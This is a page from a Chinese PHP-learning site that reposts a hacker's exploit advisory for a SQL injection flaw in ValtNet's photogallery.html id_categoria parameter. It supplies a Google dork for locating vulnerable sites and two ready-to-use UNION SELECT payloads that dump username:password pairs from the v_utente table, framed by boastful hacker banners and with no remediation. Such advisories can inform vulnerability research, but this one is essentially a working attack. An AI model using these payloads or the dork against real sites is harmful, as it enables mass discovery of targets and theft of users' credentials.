ValtNet (photogallery.html?id_categoria) 远程sql注射缺陷及-自学php网

ValtNet (photogallery.html?id_categoria) 远程sql注射缺陷及

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] ehsan_hp200 hotmail com################################ IRANIAN THE BEST HACKERS IN THE WORLD ###################################### ######################## Remote SQL injection Vu......

ehsan_hp200 hotmail com
################################ IRANIAN THE BEST HACKERS IN THE WORLD ##################
#################### ####################
##
## Remote SQL injection Vulnerability
##
## ValtNet (photogallery.html?id_categoria)
##
###############################################################
###############################################################
###############################################################
###############################################################
##
## AuTh0r : Ehsan_Hp200
##
## H0ME : www.ehsanhp.blogsky.com
##
## Email : Ehsan_Hp200 (at) Hotmail (dot) com [email concealed]
##
## Vendor : http://www.valtnet.com/ www.2cto.com
##
## Persian Gulf 4 Ever!
#############################
#############################
#############################
#############################
#############################
##
##

Dork : allinurl:"photogallery.html?id_categoria="

Exploite:

www.2cto.com /photogallery.html?id_categoria=-0 union select 1,2,concat(username,0x3a,password),4,5,6 from v_utente

Or :

www.2cto.com /photogallery.html?id_categoria=-0 union select 1,2,concat(username,0x3a,password),4,5 from v_utente

########################################################################
#################
SpeCial TanX To : Skote_Vahshat
########################################################################
##################
############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################

Concrete CMS 5.4.1.1及更低版本跨站脚本缺陷及修复

博客安全系列之WordPress - 网站安全 - 自学php

子栏目

ValtNet (photogallery.html?id_categoria) 远程sql注射缺陷及

最新评论

添加评论

更多文章推荐

添加评论